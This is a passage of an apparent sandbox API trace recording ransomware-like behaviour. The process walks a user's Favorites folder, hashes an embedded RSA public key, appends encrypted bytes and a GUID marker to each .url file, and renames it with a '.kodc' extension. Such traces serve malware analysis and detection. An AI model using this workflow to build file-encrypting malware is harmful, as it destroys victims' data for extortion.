hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0101.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0101.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0101.560] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0101.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0101.560] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0101.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.560] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.560] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.560] CloseHandle (hObject=0x5cc) returned 1 [0101.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x32c9230 [0101.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x32d0db8 [0101.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c9230 | out: hHeap=0x630000) returned 1 [0101.561] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.kodc")) returned 1 [0101.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0101.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.562] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.564] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.564] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0101.564] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.564] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0101.564] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.564] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned=".url" [0101.564] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.565] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=133) returned 1 [0101.565] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.569] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.569] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.570] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.570] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x85, lpOverlapped=0x0) returned 1 [0101.570] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.570] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.570] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.570] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.571] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.571] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.571] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.572] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.572] GetLastError () returned 0x0 [0101.572] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.572] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.572] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.572] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.572] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.572] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6040 [0101.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8010 [0101.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6088 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8028 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8058 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8070 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.573] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8058 | out: hHeap=0x630000) returned 1 [0101.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8070 | out: hHeap=0x630000) returned 1 [0101.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8070 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8058 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8070 | out: hHeap=0x630000) returned 1 [0101.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8058 | out: hHeap=0x630000) returned 1 [0101.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.574] GetCurrentThreadId () returned 0x42c [0101.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba81e8 [0101.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.574] GetCurrentThreadId () returned 0x42c [0101.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8058 [0101.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0101.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8070 [0101.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8040 [0101.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.576] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.576] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.577] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.577] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.577] CloseHandle (hObject=0x5cc) returned 1 [0101.578] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.kodc")) returned 1 [0101.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0101.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.579] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.581] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0101.581] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned=".url" [0101.581] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.582] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=133) returned 1 [0101.582] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.586] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.586] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.587] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.587] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x85, lpOverlapped=0x0) returned 1 [0101.588] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.588] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.588] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.588] lstrlenA (lpString="-----BEGIN PUBLIC 